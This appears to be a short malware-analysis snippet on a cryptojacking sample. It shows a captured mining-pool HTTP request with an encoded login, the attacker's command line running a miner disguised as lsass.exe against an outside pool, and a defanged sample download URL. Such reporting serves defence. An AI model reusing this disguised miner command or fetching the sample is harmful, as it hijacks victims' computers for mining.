Resolved: [pool.50btc.com] to [144.76.52.43]
HTTP Requests:
hxxp://pool.50btc.com:8332/
DATA:
POST / HTTP/1.1
Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==
Content-Length: 128
X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchto
User-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3)
Host: pool.50btc.com:8332
Cache-Control: no-cache
{"method": "getblocktemplate", "params": [{"capabilities": ["coinbasetxn", "workid", "coinbase/append", "longpollid"]}], "id": 0}
Here is the hacker's command line:
lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332
Sample: hxxp://158.255.2.104/cucaz.exe
Hosting info:
http://whois.domaintools.com/144.76.52.43